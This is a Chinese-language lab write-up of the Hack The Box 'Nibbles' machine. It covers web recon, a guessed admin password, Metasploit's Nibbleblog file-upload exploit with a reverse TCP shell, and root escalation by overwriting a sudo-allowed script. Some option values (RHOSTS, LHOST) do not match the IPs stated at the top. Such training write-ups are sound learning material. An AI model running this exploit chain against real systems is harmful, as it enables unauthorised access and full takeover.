環境介紹:
本機(Local)10.10.15.143
靶機(Target--Nibbles) 10.129.200.170
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ whatweb 10.129.200.170
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ curl 10.129.200.170
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
從這個網頁可以看到提示 有nibbleblog目錄
gobuster dir -u http://10.129.200.170/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
http://10.129.200.170/nibbleblog/content/
目錄瀏覽
看到這個設定檔,不禁讓我們想到密碼可能是nibbles
http://10.129.200.170/nibbleblog/content/private/config.xml
<name type="string">Nibbles</name>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
##進入msf
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ msfconsole
Metasploit tip: Use sessions -1 to interact with the last opened session
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v6.4.71-dev ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 431 post ]
+ -- --=[ 1669 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
##搜尋nibbleblog弱點
[msf](Jobs:0 Agents:0) >> search nibbleblog
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
##使用弱點
[msf](Jobs:0 Agents:0) >> use 0
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.42.190 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
##爆破
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
##取得能解壓縮的命令列
(Meterpreter 1)(/home/nibbler) > shell
##查看有特權的使用者和目錄
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
pwd
/home/nibbler
ls
personal.zip
user.txt
##執行解壓縮
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
ls
personal
personal.zip
user.txt
cd personal
ls
stuff
cd stuff
ls
monitor.sh
#將執行root的指令覆蓋monitor.sh
echo 'cat /root/root.txt' > monitor.sh
##執行指令
sudo ./monitor.sh
##取得flag
de5e5d6619862a8aa5b9b
